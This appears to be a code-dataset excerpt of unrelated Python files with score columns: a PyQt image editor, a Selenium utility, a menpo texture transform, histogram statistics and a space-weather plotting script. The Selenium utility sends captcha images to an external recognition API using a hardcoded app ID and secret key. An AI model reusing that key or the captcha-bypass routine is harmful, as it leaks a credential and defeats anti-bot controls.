print('self.count(): {}'.format(self.count()))
self.insertItem(1, item)
print('self.count(): {}'.format(self.count()))
self.setCurrentRow(1)
print('curRow: {}'.format(self.currentRow()))
assert self.currentRow() == 1
print('curRow: {}'.format(self.currentRow()))
assert self.currentRow() > 0
print('from -> to : {} -> {}'.format(self.indexfrom, self.currentRow()))
if self.indexfrom != self.currentRow():
window.mainWindow.image_board.reorder(self.indexfrom, self.currentRow())
def getImg(self, item):
window.mainWindow.image_board.selectImage(self.indexfrom)
def addItem(self, item):
super(Gallery, self).addItem(item)
def removeImg(self, index):
print('index: {}'.format(index))
item = self.takeItem(index)
print(self.count())
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.image_list_width = 256
self.image_board_height = 1080
self.image_board_width = 1920
# MainWindow Size
self.resize(QSize(self.image_board_width + self.image_list_width, self.image_board_height))
button_list = QMenuBar()
button_list.addAction('SetBackGround', self.setBackGround)
button_list.addAction('AddImage', self.addImage)
button_list.addAction('SaveImage', self.saveImage)
button_list.addAction('ResizeMode', self.setresizeMode)
button_list.addAction('MoveMode', self.setmoveMode)
button_list.addAction('FlipMode', self.setflipMode)
button_list.addAction('TurnMode', self.setturnMode)
button_list.addAction('RemoveImage', self.removeImg)
button_list.addAction('Cut', self.cutImg)
self.setMenuBar(button_list)
self.mainWindow = MainQWidget()
self.setCentralWidget(self.mainWindow)
self.setBG = False
def removeImg(self):
index = self.mainWindow.image_board.selectedImgIndex
if index > 0:
self.mainWindow.image_board.removeImg(index)
self.mainWindow.image_lists.removeImg(index)
def setBackGround(self):
self.mainWindow.image_lists.clear()
self.mainWindow.image_lists.setViewMode(QListView.ListMode)
self.mainWindow.image_lists.setDragDropMode(QAbstractItemView.InternalMove)
self.mainWindow.image_board.initialize()
self.setBG = True
self.addImage()
def addImage(self):
filename, tmp = QFileDialog.getOpenFileName(
self, caption='Open Image', directory='./images', filter='*.png *.jpg *.bmp')
if filename is '':
return
src = cv.imread(filename)
# dst = cv.resize(src, dsize=(348, 720), interpolation=cv.INTER_CUBIC)
self.mainWindow.img = src
height, width, channel = self.mainWindow.img.shape
bytesPerLine = 3 * width
qImg = QImage(self.mainWindow.img.data, width, height, bytesPerLine,
QImage.Format_RGB888).rgbSwapped()
qPixmap = QPixmap.fromImage(qImg)
# TODO RESIZE IMAGE
qPixmap = qPixmap.scaledToHeight(720)
self.mainWindow.set_crop_mode(True, qPixmap)
# TODO main Window size 保持不變 crop window 可變動
# TODO addimage 不要更動window size 同時保證大小不超過background
# self.mainWindow.image_board.setPixmap(qPixmap)
# print(456)
# image_list_item = QListWidgetItem()
# icon = QIcon()
# icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
# image_list_item.setIcon(icon)
# self.mainWindow.image_lists.addItem(image_list_item)
def setCroppedImg(self, qPixmap):
self.mainWindow.image_board.addPixmap(qPixmap)
image_list_item = QListWidgetItem()
icon = QIcon()
icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
image_list_item.setIcon(icon)
self.mainWindow.image_lists.addItem(image_list_item)
if self.setBG:
w, h = self.mainWindow.image_board.pixmap().width(), self.mainWindow.image_board.pixmap().height()
# TODO comment out
print('w, h: ({}, {})'.format(w, h))
self.mainWindow.image_board.setFixedSize(w, h)
self.mainWindow.image_lists.setFixedSize(self.image_list_width, h)
self.setFixedSize(w + self.mainWindow.image_lists.width(), h)
def saveImage(self):
print('Save Image')
filename, tmp = QFileDialog.getSaveFileName(
self, caption='Save Image', directory='./images', filter='*.png *.jpg *.bmp')
self.mainWindow.image_board.pixmap().toImage().save(filename)
def setmoveMode(self):
self.mainWindow.image_board.mode = 0
self.mainWindow.image_board.update()
def setresizeMode(self):
self.mainWindow.image_board.mode = 1
self.mainWindow.image_board.update()
def setflipMode(self):
self.mainWindow.image_board.mode = 2
self.mainWindow.image_board.update()
def setturnMode(self):
self.mainWindow.image_board.mode = 3
self.mainWindow.image_board.update()
def cutImg(self):
if self.mainWindow.image_board.selectedImgIndex > 0:
# print('self.mainWindow.image_board.selectedImgIndex: {}'.format(self.mainWindow.image_board.selectedImgIndex))
print(self.mainWindow.image_board.imgLayerOrigin, self.mainWindow.image_board.imgLayerEraseArea)
img = self.mainWindow.image_board.imgLayerOrigin[self.mainWindow.image_board.selectedImgIndex]
imgEraseArea = self.mainWindow.image_board.imgLayerEraseArea[self.mainWindow.image_board.selectedImgIndex]
# self.mainWindow.set_cut_mode(True, img)
self.mainWindow.set_cut_mode(True, img, imgEraseArea)
if __name__ == '__main__':
app = QApplication(sys.argv)
window = MainWindow()
window.show()
app.exec_() | 0.124094 | 0.056757 |
import pickle
import random
import string
import time
from libs.ShowapiRequest import ShowapiRequest
from PIL import Image
import os
def get_logger():
import logging
import logging.handlers
import datetime
logger = logging.getLogger('mylogger')
logger.setLevel(logging.DEBUG)
rf_handler = logging.handlers.TimedRotatingFileHandler('all.log', when='midnight', interval=1, backupCount=7,
atTime=datetime.time(0, 0, 0, 0))
rf_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s"))
f_handler = logging.FileHandler('error.log')
f_handler.setLevel(logging.ERROR)
f_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"))
logger.addHandler(rf_handler)
logger.addHandler(f_handler)
return logger
def get_code(driver, id):
# 获取验证码图片
t = time.time()
path = os.path.dirname(os.path.dirname(__file__)) + '\\screenshots'
picture_name1 = path + '\\' + str(t) + '.png'
driver.save_screenshot(picture_name1)
ce = driver.find_element_by_id(id)
left = ce.location['x']
top = ce.location['y']
right = ce.size['width'] + left
height = ce.size['height'] + top
# 高清屏像素比
dpr = driver.execute_script('return window.devicePixelRatio')
print(dpr)
im = Image.open(picture_name1)
img = im.crop((left*dpr, top*dpr, right*dpr, height*dpr))
t = time.time()
picture_name2 = path + '\\' + str(t) + '.png'
img.save(picture_name2) # 这里就是截取到的验证码图片
r = ShowapiRequest("http://route.showapi.com/184-4", "290728", "1bd001f23c874581aac4db788a92c71d")
r.addFilePara("image", picture_name2)
r.addBodyPara("typeId", "34")
r.addBodyPara("convert_to_jpg", "0")
r.addBodyPara("needMorePrecise", "0")
res = r.post()
text = res.json()['showapi_res_body']
code = text['Result']
return code
# 生成随机字符串
def gen_random_str():
rand_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))
return rand_str
def save_cookie(driver, path):
with open(path, 'wb') as filehandler:
cookies = driver.get_cookies()
print(cookies)
pickle.dump(cookies, filehandler)
def load_cookie(driver, path):
with open(path, 'rb') as cookiesfile:
cookies = pickle.load(cookiesfile)
for cookie in cookies:
driver.add_cookie(cookie) | my_selenium_project/util/util.py | import pickle
import random
import string
import time
from libs.ShowapiRequest import ShowapiRequest
from PIL import Image
import os
def get_logger():
import logging
import logging.handlers
import datetime
logger = logging.getLogger('mylogger')
logger.setLevel(logging.DEBUG)
rf_handler = logging.handlers.TimedRotatingFileHandler('all.log', when='midnight', interval=1, backupCount=7,
atTime=datetime.time(0, 0, 0, 0))
rf_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s"))
f_handler = logging.FileHandler('error.log')
f_handler.setLevel(logging.ERROR)
f_handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"))
logger.addHandler(rf_handler)
logger.addHandler(f_handler)
return logger
def get_code(driver, id):
# 获取验证码图片
t = time.time()
path = os.path.dirname(os.path.dirname(__file__)) + '\\screenshots'
picture_name1 = path + '\\' + str(t) + '.png'
driver.save_screenshot(picture_name1)
ce = driver.find_element_by_id(id)
left = ce.location['x']
top = ce.location['y']
right = ce.size['width'] + left
height = ce.size['height'] + top
# 高清屏像素比
dpr = driver.execute_script('return window.devicePixelRatio')
print(dpr)
im = Image.open(picture_name1)
img = im.crop((left*dpr, top*dpr, right*dpr, height*dpr))
t = time.time()
picture_name2 = path + '\\' + str(t) + '.png'
img.save(picture_name2) # 这里就是截取到的验证码图片
r = ShowapiRequest("http://route.showapi.com/184-4", "290728", "1bd001f23c874581aac4db788a92c71d")
r.addFilePara("image", picture_name2)
r.addBodyPara("typeId", "34")
r.addBodyPara("convert_to_jpg", "0")
r.addBodyPara("needMorePrecise", "0")
res = r.post()
text = res.json()['showapi_res_body']
code = text['Result']
return code
# 生成随机字符串
def gen_random_str():
rand_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))
return rand_str
def save_cookie(driver, path):
with open(path, 'wb') as filehandler:
cookies = driver.get_cookies()
print(cookies)
pickle.dump(cookies, filehandler)
def load_cookie(driver, path):
with open(path, 'rb') as cookiesfile:
cookies = pickle.load(cookiesfile)
for cookie in cookies:
driver.add_cookie(cookie) | 0.247351 | 0.066448 |
import numpy as np
from menpo.transform import Homogeneous, Scale
def tcoords_to_image_coords(image_shape):
r"""
Returns a :map:`Homogeneous` transform that converts [0,1]
texture coordinates (tcoords) used on :map:`TexturedTriMesh`
instances to image coordinates, which behave just like image landmarks
do.
The operations that are performed are:
- Flipping the origin from bottom-left to top-left
- Permuting the axis so that st (or uv) -> yx
- Scaling the tcoords by the image shape (denormalising them). Note that
(1, 1) has to map to the highest pixel value, which is actually
(h - 1, w - 1) due to Menpo being 0-based with image operations.
Parameters
----------
image_shape : `tuple`
The shape of the texture that the tcoords index in to.
Returns
-------
:map:`Homogeneous`
A transform that, when applied to texture coordinates, converts them
to image coordinates.
"""
# flip the 'y' st 1 -> 0 and 0 -> 1, moving the axis to upper left
invert_unit_y = Homogeneous(
np.array([[1.0, 0.0, 0.0], [0.0, -1.0, 1.0], [0.0, 0.0, 1.0]])
)
# flip axis 0 and axis 1 so indexing is as expected
flip_xy_yx = Homogeneous(
np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
)
return invert_unit_y.compose_before(flip_xy_yx).compose_before(
Scale(np.array(image_shape) - 1)
)
def image_coords_to_tcoords(image_shape):
r"""
Returns a :map:`Homogeneous` transform that converts image coordinates
(e.g. image landmarks) to texture coordinates (tcoords) as used on
:map:`TexturedTriMesh` instances.
The operations that are performed are:
- Normalizing by image shape (e.g. converting to [0, 1]). Note that
(1, 1) has to map to the highest pixel value, which is actually
(h - 1, w - 1) due to Menpo being 0-based with image operations.
- Permuting the axis so that yx -> st (or uv)
- Flipping the origin from top-left to bottom-left
Parameters
----------
image_shape : `tuple`
The shape of the texture that the image coordinates are on.
Returns
-------
:map:`Homogeneous`
A transform that, when applied to image coordinates, converts them
to texture coordinates (tcoords).
"""
return tcoords_to_image_coords(image_shape).pseudoinverse() | menpo/transform/tcoords.py | import numpy as np
from menpo.transform import Homogeneous, Scale
def tcoords_to_image_coords(image_shape):
r"""
Returns a :map:`Homogeneous` transform that converts [0,1]
texture coordinates (tcoords) used on :map:`TexturedTriMesh`
instances to image coordinates, which behave just like image landmarks
do.
The operations that are performed are:
- Flipping the origin from bottom-left to top-left
- Permuting the axis so that st (or uv) -> yx
- Scaling the tcoords by the image shape (denormalising them). Note that
(1, 1) has to map to the highest pixel value, which is actually
(h - 1, w - 1) due to Menpo being 0-based with image operations.
Parameters
----------
image_shape : `tuple`
The shape of the texture that the tcoords index in to.
Returns
-------
:map:`Homogeneous`
A transform that, when applied to texture coordinates, converts them
to image coordinates.
"""
# flip the 'y' st 1 -> 0 and 0 -> 1, moving the axis to upper left
invert_unit_y = Homogeneous(
np.array([[1.0, 0.0, 0.0], [0.0, -1.0, 1.0], [0.0, 0.0, 1.0]])
)
# flip axis 0 and axis 1 so indexing is as expected
flip_xy_yx = Homogeneous(
np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
)
return invert_unit_y.compose_before(flip_xy_yx).compose_before(
Scale(np.array(image_shape) - 1)
)
def image_coords_to_tcoords(image_shape):
r"""
Returns a :map:`Homogeneous` transform that converts image coordinates
(e.g. image landmarks) to texture coordinates (tcoords) as used on
:map:`TexturedTriMesh` instances.
The operations that are performed are:
- Normalizing by image shape (e.g. converting to [0, 1]). Note that
(1, 1) has to map to the highest pixel value, which is actually
(h - 1, w - 1) due to Menpo being 0-based with image operations.
- Permuting the axis so that yx -> st (or uv)
- Flipping the origin from top-left to bottom-left
Parameters
----------
image_shape : `tuple`
The shape of the texture that the image coordinates are on.
Returns
-------
:map:`Homogeneous`
A transform that, when applied to image coordinates, converts them
to texture coordinates (tcoords).
"""
return tcoords_to_image_coords(image_shape).pseudoinverse() | 0.919154 | 0.874721 |
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from scipy import stats
import scipy.integrate as integrate
def read_data(file_name):
f = open(file_name, 'r')
line1 = f.readline()
#names1 = line1.replace('#', ' ').split()
data_read = pd.read_csv(f, sep="\s+", names=line1.replace('#', ' ').split(), skiprows=0)
return data_read
def draw_histo(data, field_name, title):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True, label='Histogram')
mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
ax0.plot(bins_v1, best_fit_line_v1, label='$\mu$ = {0:6.3f}\n$\sigma$ = {1:6.3f}'.format(mu_v1, sigma_v1))
ax0.legend()
plt.title(title)
plt.show()
print("mu = {0}, sigma = {1}".format(mu_v1, sigma_v1))
return ax0
def draw_histo_multi(data_items, field_name, titles, title, legend=True):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
idx = 0
for data in data_items:
x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True)
mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
ax0.plot(bins_v1, best_fit_line_v1, label=titles[idx])
idx=idx+1
if legend:
ax0.legend()
plt.title(title)
plt.show()
def draw_histo_center(data, field_name, title):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
values, bins, p = ax0.hist(data[field_name], bins = 100, density=True, label='Histogram')
mu, sigma = stats.norm.fit(data[field_name])
bin_centers = 0.5*(bins[1:] + bins[:-1])
pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
ax0.plot(bin_centers, pdf, label="PDF")
ax0.legend()
plt.title(title)
plt.show()
print("mu = {0}, sigma = {1}".format(mu, sigma))
return ax0
def draw_histo_center_multi(data_items, field_name, titles, title, legend = True):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
idx = 0
for data in data_items:
values, bins, p = ax0.hist(data[field_name], bins = 100, density=True)
mu, sigma = stats.norm.fit(data[field_name])
bin_centers = 0.5*(bins[1:] + bins[:-1])
pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
ax0.plot(bin_centers, pdf, label=titles[idx])
if legend:
ax0.legend()
idx += 1
plt.title(title)
plt.show()
def get_histo_bins(data, bin_number, field_name):
fig = matplotlib.figure.Figure()
ax = matplotlib.axes.Axes(fig, (0,0,0,0))
values, bins, p = ax.hist(data[field_name], bins = bin_number, density = True)
del ax, fig
return values, bins, p
def get_histo_bins_bin(data, given_bins, field_name):
fig = matplotlib.figure.Figure()
ax = matplotlib.axes.Axes(fig, (0,0,0,0))
#print('given_bins = {0}'.format(len(given_bins)))
values, bins, p = ax.hist(data[field_name], bins = given_bins, density = True)
#print('bins = {0}'.format(len(bins)))
del ax, fig
return values, bins, p
def integrate_histo(data, bin_number, field_name):
values, bins, p = get_histo_bins(data, bin_number, field_name)
bin_centers = 0.5*(bins[1:]+bins[:-1])
int_value = integrate.simpson(values, bin_centers)
return int_value
def find_bins(small_size, small_bins, big_size, big_bins):
start_idx = np.floor((big_bins[0]-small_bins[0])/small_size)
bin_edge = small_bins[0] + start_idx * small_size
idx = 0
offset_idx = start_idx
big_bin_number = big_bins.size
new_bins = []
new_bins.append(bin_edge)
while new_bins[idx] < big_bins[big_bin_number -1]:
idx += 1
new_bins.append(new_bins[idx-1] + small_size)
return new_bins
def merge_bins(bins1, values1, bins2, values2, bin_size):
bins1_number = len(bins1)
bins2_number = len(bins2)
#print('bins1_number = {0}, values1 size = {1}'.format(bins1_number, len(values1)))
#print('bins2_number = {0}, values2 size = {1}'.format(bins2_number, len(values2)))
bins1_start = bins1[0]
bins1_end = bins1[bins1_number -1]
bins2_start = bins2[0]
bins2_end = bins2[bins2_number -1]
bin_start = min(bins1_start, bins2_start)
bin_end = max(bins1_end, bins2_end)
merged_bins = []
merged_values1 = []
merged_values2 = []
bin_edge = bin_start
bins1_idx = 0
bins2_idx = 0
while bin_edge < bin_end:
merged_bins.append(bin_edge)
if bin_edge < bins1_start or bin_edge >= bins1_end:
merged_values1.append(0)
elif bin_edge < bins1_end and bins1_idx < bins1_number -1:
merged_values1.append(values1[bins1_idx])
bins1_idx += 1
if bin_edge < bins2_start or bin_edge >= bins2_end:
merged_values2.append(0)
elif bin_edge < bins2_end and bins2_idx < bins2_number - 1:
merged_values2.append(values2[bins2_idx])
bins2_idx += 1
bin_edge += bin_size
return merged_bins, merged_values1, merged_values2
def integrate_diff_histo(data1, data2, bin_number, field_name):
#print(data1)
#print(data2)
values1, bins1, p1 = get_histo_bins(data1, bin_number, field_name)
values2, bins2, p2 = get_histo_bins(data2, bin_number, field_name)
#print('bins1 = {0}'.format(bins1))
#print('bins2 = {0}'.format(bins2))
bin_size1 = bins1[1] - bins1[0]
bin_size2 = bins2[1] - bins2[0]
bin_size = bin_size1
#print('size 1 = {0}'.format(bin_size1))
#print('size 2 = {0}'.format(bin_size2))
if bin_size1 < bin_size2: # recalculate for data2
new_bins2 = find_bins(bin_size1, bins1, bin_size2, bins2)
values2, bins2, p2 = get_histo_bins_bin(data2, new_bins2, field_name)
#print('new_bins2 size = {0}'.format(new_bins2[1]-new_bins2[0]))
#print('new_bins2 number = {0}, old = {1}'.format(len(new_bins2), len(bins2)))
elif bin_size1 > bin_size2: # recalculate for data1
bin_size = bin_size2
new_bins1 = find_bins(bin_size2, bins2, bin_size1, bins1)
values1, bins1, p1 = get_histo_bins_bin(data1, new_bins1, field_name)
#print('new_bins1 size = {0}'.format(new_bins1[1]-new_bins1[0]))
#print('new_bins1 number = {0}, old = {1}'.format(len(new_bins1), len(bins1)))
merged_bins, merged_values1, merged_values2 = merge_bins(bins1, values1, bins2, values2, bin_size)
#print('merged_bins size = {0}'.format(len(merged_bins)))
#print('merged_values1 size = {0}'.format(len(merged_values1)))
#print('merged_values2 size = {0}'.format(len(merged_values2)))
# zero appends
if len(merged_values1) < len(merged_bins):
for idx in range(len(merged_bins)-len(merged_values1)):
merged_values1.append(0)
if len(merged_values2) < len(merged_bins):
for idx in range(len(merged_bins)-len(merged_values2)):
merged_values2.append(0)
min_values = []
for idx in range(len(merged_bins)):
min_values.append(min(merged_values1[idx], merged_values2[idx]))
#print('min_values size = {0}'.format(len(min_values)))
confusion = integrate.simpson(min_values, merged_bins)
#print('confusion = {0}'.format(confusion))
return confusion
def calc_confusion_factors(names, bins, field_name):
cf_list = []
data_items = []
for file_name in names:
data = read_data(file_name)
#print("file_name = {0}, data_mean = {1}".format(file_name, np.mean(data)))
data_items.append(data)
for idx in range(len(data_items)):
cf = integrate_diff_histo(data_items[0], data_items[idx], bins, field_name)
cf_list.append(cf)
return cf_list | src/confusion_factor/histo_confusion.py | import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from scipy import stats
import scipy.integrate as integrate
def read_data(file_name):
f = open(file_name, 'r')
line1 = f.readline()
#names1 = line1.replace('#', ' ').split()
data_read = pd.read_csv(f, sep="\s+", names=line1.replace('#', ' ').split(), skiprows=0)
return data_read
def draw_histo(data, field_name, title):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True, label='Histogram')
mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
ax0.plot(bins_v1, best_fit_line_v1, label='$\mu$ = {0:6.3f}\n$\sigma$ = {1:6.3f}'.format(mu_v1, sigma_v1))
ax0.legend()
plt.title(title)
plt.show()
print("mu = {0}, sigma = {1}".format(mu_v1, sigma_v1))
return ax0
def draw_histo_multi(data_items, field_name, titles, title, legend=True):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
idx = 0
for data in data_items:
x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True)
mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
ax0.plot(bins_v1, best_fit_line_v1, label=titles[idx])
idx=idx+1
if legend:
ax0.legend()
plt.title(title)
plt.show()
def draw_histo_center(data, field_name, title):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
values, bins, p = ax0.hist(data[field_name], bins = 100, density=True, label='Histogram')
mu, sigma = stats.norm.fit(data[field_name])
bin_centers = 0.5*(bins[1:] + bins[:-1])
pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
ax0.plot(bin_centers, pdf, label="PDF")
ax0.legend()
plt.title(title)
plt.show()
print("mu = {0}, sigma = {1}".format(mu, sigma))
return ax0
def draw_histo_center_multi(data_items, field_name, titles, title, legend = True):
fig, ax0 = plt.subplots(ncols=1, nrows=1)
idx = 0
for data in data_items:
values, bins, p = ax0.hist(data[field_name], bins = 100, density=True)
mu, sigma = stats.norm.fit(data[field_name])
bin_centers = 0.5*(bins[1:] + bins[:-1])
pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
ax0.plot(bin_centers, pdf, label=titles[idx])
if legend:
ax0.legend()
idx += 1
plt.title(title)
plt.show()
def get_histo_bins(data, bin_number, field_name):
fig = matplotlib.figure.Figure()
ax = matplotlib.axes.Axes(fig, (0,0,0,0))
values, bins, p = ax.hist(data[field_name], bins = bin_number, density = True)
del ax, fig
return values, bins, p
def get_histo_bins_bin(data, given_bins, field_name):
fig = matplotlib.figure.Figure()
ax = matplotlib.axes.Axes(fig, (0,0,0,0))
#print('given_bins = {0}'.format(len(given_bins)))
values, bins, p = ax.hist(data[field_name], bins = given_bins, density = True)
#print('bins = {0}'.format(len(bins)))
del ax, fig
return values, bins, p
def integrate_histo(data, bin_number, field_name):
values, bins, p = get_histo_bins(data, bin_number, field_name)
bin_centers = 0.5*(bins[1:]+bins[:-1])
int_value = integrate.simpson(values, bin_centers)
return int_value
def find_bins(small_size, small_bins, big_size, big_bins):
start_idx = np.floor((big_bins[0]-small_bins[0])/small_size)
bin_edge = small_bins[0] + start_idx * small_size
idx = 0
offset_idx = start_idx
big_bin_number = big_bins.size
new_bins = []
new_bins.append(bin_edge)
while new_bins[idx] < big_bins[big_bin_number -1]:
idx += 1
new_bins.append(new_bins[idx-1] + small_size)
return new_bins
def merge_bins(bins1, values1, bins2, values2, bin_size):
bins1_number = len(bins1)
bins2_number = len(bins2)
#print('bins1_number = {0}, values1 size = {1}'.format(bins1_number, len(values1)))
#print('bins2_number = {0}, values2 size = {1}'.format(bins2_number, len(values2)))
bins1_start = bins1[0]
bins1_end = bins1[bins1_number -1]
bins2_start = bins2[0]
bins2_end = bins2[bins2_number -1]
bin_start = min(bins1_start, bins2_start)
bin_end = max(bins1_end, bins2_end)
merged_bins = []
merged_values1 = []
merged_values2 = []
bin_edge = bin_start
bins1_idx = 0
bins2_idx = 0
while bin_edge < bin_end:
merged_bins.append(bin_edge)
if bin_edge < bins1_start or bin_edge >= bins1_end:
merged_values1.append(0)
elif bin_edge < bins1_end and bins1_idx < bins1_number -1:
merged_values1.append(values1[bins1_idx])
bins1_idx += 1
if bin_edge < bins2_start or bin_edge >= bins2_end:
merged_values2.append(0)
elif bin_edge < bins2_end and bins2_idx < bins2_number - 1:
merged_values2.append(values2[bins2_idx])
bins2_idx += 1
bin_edge += bin_size
return merged_bins, merged_values1, merged_values2
def integrate_diff_histo(data1, data2, bin_number, field_name):
#print(data1)
#print(data2)
values1, bins1, p1 = get_histo_bins(data1, bin_number, field_name)
values2, bins2, p2 = get_histo_bins(data2, bin_number, field_name)
#print('bins1 = {0}'.format(bins1))
#print('bins2 = {0}'.format(bins2))
bin_size1 = bins1[1] - bins1[0]
bin_size2 = bins2[1] - bins2[0]
bin_size = bin_size1
#print('size 1 = {0}'.format(bin_size1))
#print('size 2 = {0}'.format(bin_size2))
if bin_size1 < bin_size2: # recalculate for data2
new_bins2 = find_bins(bin_size1, bins1, bin_size2, bins2)
values2, bins2, p2 = get_histo_bins_bin(data2, new_bins2, field_name)
#print('new_bins2 size = {0}'.format(new_bins2[1]-new_bins2[0]))
#print('new_bins2 number = {0}, old = {1}'.format(len(new_bins2), len(bins2)))
elif bin_size1 > bin_size2: # recalculate for data1
bin_size = bin_size2
new_bins1 = find_bins(bin_size2, bins2, bin_size1, bins1)
values1, bins1, p1 = get_histo_bins_bin(data1, new_bins1, field_name)
#print('new_bins1 size = {0}'.format(new_bins1[1]-new_bins1[0]))
#print('new_bins1 number = {0}, old = {1}'.format(len(new_bins1), len(bins1)))
merged_bins, merged_values1, merged_values2 = merge_bins(bins1, values1, bins2, values2, bin_size)
#print('merged_bins size = {0}'.format(len(merged_bins)))
#print('merged_values1 size = {0}'.format(len(merged_values1)))
#print('merged_values2 size = {0}'.format(len(merged_values2)))
# zero appends
if len(merged_values1) < len(merged_bins):
for idx in range(len(merged_bins)-len(merged_values1)):
merged_values1.append(0)
if len(merged_values2) < len(merged_bins):
for idx in range(len(merged_bins)-len(merged_values2)):
merged_values2.append(0)
min_values = []
for idx in range(len(merged_bins)):
min_values.append(min(merged_values1[idx], merged_values2[idx]))
#print('min_values size = {0}'.format(len(min_values)))
confusion = integrate.simpson(min_values, merged_bins)
#print('confusion = {0}'.format(confusion))
return confusion
def calc_confusion_factors(names, bins, field_name):
cf_list = []
data_items = []
for file_name in names:
data = read_data(file_name)
#print("file_name = {0}, data_mean = {1}".format(file_name, np.mean(data)))
data_items.append(data)
for idx in range(len(data_items)):
cf = integrate_diff_histo(data_items[0], data_items[idx], bins, field_name)
cf_list.append(cf)
return cf_list | 0.213213 | 0.511107 |
import spacepy
import spacepy.pybats.bats as bts
import sys
sys.path.append('/Users/sgraf/Desktop/SWMFtools')
sys.path.append('/Users/sgraf/Desktop/SWMFtools/dBdt')
import util
import matplotlib.pyplot as plt
import matplotlib
import supermag_parser
import spacepy.plot as splot
splot.style('spacepy')
plt.rcParams["legend.frameon"] = True
plt.rcParams["legend.facecolor"] = 'white'
def results_summary_update(log, geolog, show=True):
"""3-panel summary plot from log and geoindex files
"""
fig, axes = plt.subplots(figsize=(10,10),nrows=3, ncols=1, sharex=True,gridspec_kw={'height_ratios': [2, 2, 1]})
geolog.add_ae_quicklook(val='AU', plot_obs=True, target=axes[0], label='Unsmoothed',c='r')
geolog.add_ae_quicklook(val='AL', plot_obs=True, target=axes[0],label=None, c='r')
geolog.add_kp_quicklook(plot_obs=True, target=axes[1], label='Unsmoothed',c='r')
log.add_dst_quicklook(plot_obs=True, target=axes[2], label='Unsmoothed',c='r')
axes[0].set_xlabel('')
axes[1].set_xlabel('')
if show:
plt.show()
return fig, axes
dates = ['20061214','20010830','20050831','20100405','20110805','20150316']
for date in dates:
hour_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date))
orig_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date))
thirty_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min/'.format(date))
thirty_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min'.format(date),logtype='geo')
hour_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date),logtype='geo')
orig_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date),logtype='geo')
fig, axes = results_summary_update(orig_logs,orig_geo,show=False)
hour_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='Hourly', c='b')
hour_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label='Test', c='b')
hour_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='Hourly',c='b')
hour_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='Hourly',c='b')
thirty_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='30min',c='g')
thirty_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label=None,c='g')
thirty_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='30min',c='g')
thirty_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='30min',c='g')
axes[0].get_legend().remove()
axes[2].get_legend().remove()
axes[0].set_ylabel('AU/AL (nT)')
fig.suptitle('Summary Plot')
fig.subplots_adjust(top=0.88)
#plt.show()
plt.savefig('{}_au_al_summary_plot_overlay.png'.format(date))
#fig, axes = results_summary_update(hour_logs,hour_geo,show=False)
#fig.suptitle('Hourly Smoothed Summary Plot')
#fig.subplots_adjust(top=0.88)
#plt.savefig('{}_au_al_summary_plot_hourly.png'.format(date))
#fig, axes = results_summary_update(thirty_logs,thirty_geo,show=False)
#fig.suptitle('30min Smoothed Summary Plot')
#fig.subplots_adjust(top=0.88)
#plt.savefig('{}_au_al_summary_plot_30min.png'.format(date))
'''
diff_dst = orig_logs['dst_sm'] - hour_logs['dst_sm']
fig, axes = plt.subplots(nrows=3, ncols=1, sharex=True)
orig_logs.add_dst_quicklook(plot_obs=True, target=axes[0])
hour_logs.add_dst_quicklook(plot_obs=True, target=axes[1])
axes[2].plot(orig_logs['time'],diff_dst)
